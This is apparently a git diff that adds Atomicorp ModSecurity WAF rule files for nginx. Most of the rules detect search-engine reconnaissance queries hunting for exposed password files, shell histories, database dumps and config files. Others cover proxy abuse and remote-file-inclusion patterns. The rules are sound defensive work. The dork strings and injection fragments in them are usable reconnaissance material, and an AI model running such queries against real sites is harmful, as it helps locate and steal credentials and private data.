+SecRule REQUEST_HEADERS:Referer   "filetype:mny mny" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371392,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ctt ctt messenger" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371395,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:log access\.log -cvs" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371406,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:log cron\.log" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371407,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:wab wab " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371412,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "mysql dump filetype:sql" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371432,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "robots\.txt \+ disallow: filetype:txt" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371452,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "phpmyadmin mysql-dump filetype:txt" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371461,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:htaccess basic" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371464,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:wsdl wsdl" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371603,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cnf my\.cnf -cvs -example" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371604,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pl download: suse linux openexchange server ca " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371860,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cfg login loginserver=" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371871,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:r2w r2w" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371887,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+
+SecMarker END_RECON_CHECKS_FILETYPE
+
+SecRule REQUEST_HEADERS:Referer "(?:index.of|result index on line)"         "id:333895,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:329545,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_INDEX"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of \.(?:sh_history|bash_history)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of \.diz \.nfo last modified" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371298,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of \* admin news\.asp configview\.asp" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371336,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of inbox dbx" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371433,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of ws_ftp\.ini" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371445,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of dead\.letter" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371446,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of apache server at" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371447,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of.(?:etc|passlist|administrators|sites.ini)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of cgiirc\.config'" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371459,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of haccess\.ctl" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371465,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of*config" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371610,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of robots\.txt" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of web-inf" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371620,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of /maildir/" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371621,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of abyss\.conf" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371630,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index.of / stats merchant" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371635,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of sc_serv\.conf sc_serv content" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371072,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of passwords modified" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371113,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of trillian\.ini" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of config\.php" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371161,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of\.\.etc passwd" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371162,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of spwd\.db passwd" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371163,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of \.htpasswd htgroup" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371164,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of \.htpasswd htpasswd\.bak" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371165,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of pwd\.db" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371166,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of master\.passwd" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371167,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of passwd passwd\.bak" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371168,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of people\.lst" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371169,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of \.mysql_history" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371171,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of upload size parent directory" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371333,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of cookies\.txt size" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371378,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of \+myd \+size" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371383,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of mysql\.conf or mysql_config" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371409,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "mystuff\.xml intitle:index of" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371462,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of mt-db-pass\.cgi" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of finances\.xls" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of finance\.xls" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of dbconvert\.exe chats" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of \* mode links bytes last-changed name" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371490,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of / modified php\.exe" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371606,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of /cfide/ administrator" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371631,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of parent directory desktop\.ini site:dyndns\.org" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371633,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of /phpmyadm" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371648,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of cfide" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371659,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index of c:\\windows" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371661,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of\.personal" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371660,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of\.secure" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371666,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of\.winnt" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371667,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of\.private" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371668,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of\.secret" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371669,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+
+SecRule REQUEST_HEADERS:Referer   "index.* perform\.ini" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of / lck" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371010,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of / upload" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371017,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of ?/ ws_ftp\.ini parent directory" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371097,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "unable to jump to row on mysql result index on line" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371175,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of / chat/logs " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371430,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of rar r01 nfo modified 2004" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371624,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index.*of\.dcim" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371638,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of / picasa\.ini " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371645,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of /network last modified" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371651,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of cgi-bin" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371658,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "index of /backup" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371670,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "copyright 2010\. software index" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372393,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+
+SecMarker END_RECON_CHECKS_INDEX
+
+
+SecMarker END_RECON_CHECKS_DLP_ALL
diff --git a/nginx-waf/80_asl_proxy_abuse.conf b/nginx-waf/80_asl_proxy_abuse.conf
new file mode 100644
index 0000000..1835793
--- /dev/null
+++ b/nginx-waf/80_asl_proxy_abuse.conf
@@ -0,0 +1,42 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2005-2016 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#SecAction "phase:1,t:none,pass,nolog,initcol:global=global,initcol:ip=%{remote_addr}"
+
+
+
+
+SecRule REQUEST_HEADERS:X-Forwarded-For "^\b\d{1,3}(?<!192|127|10)\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" "chain,phase:1,severity:2,id:'356137',t:none,capture,block,rev:'2.2.6',msg:'Atomicorp.com WAF Rules: Potential Open Proxy Abuse - GeoIP Country Code Mismatch of X-Forwarded-For Request Header and Client REMOTE_ADDR',logdata:'IP Country is: %{geo.country_code} and X-Forwarded-For is: %{tx.geo_x-forwarded-for}'"
+        SecRule TX:0 "@geoLookup" "chain,setvar:tx.geo_x-forwarded-for=%{geo.country_code}"
+                SecRule REMOTE_ADDR "@geoLookup" "chain,t:none"
+                        SecRule GEO:COUNTRY_CODE "!@streq %{tx.geo_x-forwarded-for}" "t:none"
+
diff --git a/nginx-waf/98_asl_jitp.conf b/nginx-waf/98_asl_jitp.conf
new file mode 100644
index 0000000..5b26308
--- /dev/null
+++ b/nginx-waf/98_asl_jitp.conf
@@ -0,0 +1,33 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Just In Time Patches for Vulnerable Applications Rules for modsec 2.5.11
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005-2010 by Prometheus Global, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS and CONTRIBUTORS AS IS
+# and ANY EXPRESS or IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY and FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER or CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, or
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS or SERVICES; LOSS OF USE, DATA, or PROFITS; or BUSINESS
+# INTERRUPTION) HOWEVER CAUSED and ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, or TORT (INCLUDING NEGLIGENCE or OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
diff --git a/nginx-waf/999_asl_truestats.conf b/nginx-waf/999_asl_truestats.conf
new file mode 100644
index 0000000..e5c5148
--- /dev/null
+++ b/nginx-waf/999_asl_truestats.conf
@@ -0,0 +1,32 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+#
+# Copyright 2020 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
diff --git a/nginx-waf/99_asl_jitp.conf b/nginx-waf/99_asl_jitp.conf
new file mode 100644
index 0000000..02a3f33
--- /dev/null
+++ b/nginx-waf/99_asl_jitp.conf
@@ -0,0 +1,5128 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/viewtopic\.php" "phase:2,id:95347,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:95348,t:none,pass,nolog,skipAfter:END_RULES_95348"
+
+SecRule REQUEST_URI "(?:highlight.*(?:\'\.|\x2527|\x27)|include\.*get\[.*\]\|=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|(?:printf|system)\()"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390761,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_95348
+
+SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:95349,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390605,ctl:ruleRemovebyID=390603,ctl:ruleRemovebyID=390449"
+
+SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:95350,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390605,ctl:ruleRemovebyID=390603"
+
+SecRule REQUEST_FILENAME "/magento-1\.4/" "phase:2,id:95351,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390630"
+
